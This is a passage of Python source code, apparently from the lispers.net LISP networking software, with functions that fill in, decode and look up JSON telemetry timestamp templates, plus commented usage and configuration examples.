# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
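#
# Example usage (sketch; ts_in/ts_out are illustrative timestamp values):
# an ITR fills its own two fields in the configured telemetry template
# and leaves the others as "?" so the ETR can fill them later:
#
#   json_string = lisp_telemetry_configured()
#   if (json_string != None):
#       json_string = lisp_encode_telemetry(json_string, ii=ts_in, io=ts_out)
#   #endif
#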
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if (lisp_json_list.has_key("telemetry") == False): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
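#
# Example "lisp json" configuration clause that makes
# lisp_telemetry_configured() return the template (the clause form is a
# sketch of the lispers.net command syntax):
#
#   lisp json {
#       json-name = telemetry
#       json-string = { "type" : "telemetry", "sub-type" : "timestamps",
#                       "itr-out" : "?", "etr-in" : "?", "etr-out" : "?",
#                       "itr-in" : "?" }
#   }
#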
#------------------------------------------------------------------------------